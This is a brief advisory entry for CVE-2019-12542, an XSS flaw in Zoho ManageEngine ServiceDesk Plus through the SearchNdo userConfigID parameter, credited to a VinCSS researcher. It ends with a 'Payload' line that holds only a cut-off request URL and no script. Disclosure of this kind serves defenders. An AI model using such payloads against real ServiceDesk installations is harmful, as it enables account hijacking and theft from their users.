CVE-2019-12542 Zoho ManageEngine ServiceDesk Plus 93 XSS vulnerability in SearchNdo
Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 93 There is XSS via the SearchNdo userConfigID parameter
Author: Concobe of Tarantula Team - VinCSS (a member of Vingroup)
Payload
domain/SearchNdo?searchText=a&SELECTEDSITEID=1&SELECTED